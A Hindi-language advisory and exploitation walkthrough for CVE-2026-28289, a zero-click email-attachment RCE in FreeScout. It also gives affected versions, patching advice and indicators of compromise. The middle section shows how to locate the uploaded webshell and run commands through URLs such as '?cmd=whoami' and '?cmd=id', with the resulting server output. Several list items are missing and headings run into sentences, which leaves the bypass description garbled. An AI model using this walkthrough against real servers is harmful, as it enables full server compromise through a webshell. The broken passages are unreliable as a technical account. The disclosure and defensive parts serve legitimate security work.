
CVE-2026-28289

FreeScout में ईमेल अनुलग्नक बायपास के ज़रिए ज़ीरो-क्लिक, बिना प्रमाणीकरण के RCE
CVE-2026-28289, जिसे Mail2Shell उपनाम दिया गया है, FreeScout को प्रभावित करने वाली एक गंभीर ज़ीरो-क्लिक रिमोट कोड निष्पादन (Remote Code Execution - RCE) भेद्यता है।
एक हमलावर FreeScout मेलबॉक्स पर एक विशेष रूप से तैयार किया गया ईमेल भेज सकता है और बिना प्रमाणीकरण और बिना उपयोगकर्ता सहभागिता के अंतर्निहित सर्वर तक रिमोट शेल एक्सेस प्राप्त कर सकता है।
| फ़ील्ड | मान |
|---|
| CVE ID | CVE-2026-28289 |
| गंभीरता | 🔴 गंभीर |
| CVSS | 10.0 (अधिकतम) |
| हमला वेक्टर | रिमोट (ईमेल) |
| प्रमाणीकरण आवश्यक | ❌ नहीं |
| उपयोगकर्ता सहभागिता | ❌ नहीं |
| प्रभाव | पूर्ण सर्वर समझौता |
हमलावर एक विशेष रूप से तैयार किए गए अनुलग्नक के साथ एक ईमेल भेजता है।
FreeScout .htaccess जैसी खतरनाक फ़ाइलों को ब्लॉक करने का प्रयास करता है, लेकिन हमलावर:
हमलावर वेब पथ के माध्यम से अपलोड की गई फ़ाइल तक पहुँचता है और मनमाने कमांड निष्पादित करता है।
परिणाम:
# Remote shell access achieved
whoami
www-data

✅ Email sent successfully! (Zero-Click RCE triggered)
अगले चरणों के निर्देश भी आपको प्रिंट होकर दिखाई देंगे।
find कमांड चलाते हैंयह तुरंत अपलोड की गई फ़ाइल का पूरा वास्तविक पथ लौटाएगा, उदाहरण के लिए:
/var/www/html/storage/attachment/2026/03/05/15/webshell.txt
(या समान दिनांक/समय फ़ोल्डर — यह पुष्टि करता है कि FreeScout ने अनुलग्नक को स्वचालित रूप से सहेज लिया है)।
चरण 2 से पथ कॉपी करें और यह URL खोलें:
http://your-freescout-domain.com/storage/attachment/2026/03/05/15/webshell.txt?cmd=whoami
आपको यह सटीक आउटपुट दिखाई देगा (प्लेन टेक्स्ट):
www-data
(या जो भी Apache/PHP उपयोगकर्ता आपके सर्वर पर है — आमतौर पर www-data, apache, या nobody)।
अब कमांड बदलें और रिफ्रेश करें:
http://your-freescout-domain.com/storage/attachment/2026/03/05/15/webshell.txt?cmd=id
आपको दिखाई देगा:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
और ls -la के लिए:
total 12
drwxr-xr-x 2 www-data www-data 4096 Mar 5 15:00 .
drwxr-xr-x 8 www-data www-data 4096 Mar 5 14:00 ..
-rw-r--r-- 1 www-data www-data 87 Mar 5 15:00 webshell.txt
यह आउटपुट ब्राउज़र पेज में सीधे दिखाई देता है (वेबशेल के <pre> टैग के अंदर)। कोई त्रुटि नहीं, कोई PHP स्रोत कोड नहीं, कोई 404 नहीं।
इसका मतलब है कि आपके पास सर्वर पर पूर्ण रिमोट कोड निष्पादन है — .htaccess + शून्य-चौड़ाई स्पेस बायपास पूरी तरह से काम कर गया, और ईमेल अनुलग्नक को बिना किसी उपयोगकर्ता सहभागिता के संसाधित किया गया।
FreeScout के सभी संस्करण:
<= 1.8.206
तुरंत अपग्रेड करें:
1.8.207 or later
AllowOverride All अक्षम करेंइनकी तलाश करें:
.htaccess फ़ाइलें/storage/attachments/ तक सीधे पहुँच के प्रयाससमझौता संकेतक (Indicators of Compromise) में शामिल हो सकते हैं:
.htaccess फ़ाइलेंEmail → Malicious Attachment (Unicode prefixed filename)
↓
Saved to predictable path
↓
Web-accessible execution
↓
Remote shell
यह समस्या निम्न में जोड़ी गई सुरक्षाओं को बायपास करती है:
अपूर्ण फ़ाइलनाम सैनिटाइज़ेशन तर्क को प्रदर्शित करती है।
| जोखिम क्षेत्र | प्रभाव |
|---|---|
| गोपनीयता | 🔴 उच्च |
| अखंडता | 🔴 उच्च |
| उपलब्धता | 🔴 उच्च |
यदि आप FreeScout का स्व-होस्टेड इंस्टेंस चलाते हैं:
🔥 तुरंत पैच करें। 💡 यदि कमजोर संस्करण इंटरनेट पर उजागर हैं तो समझौता मानें। 🛡 लॉग समीक्षा और अखंडता जाँच करें।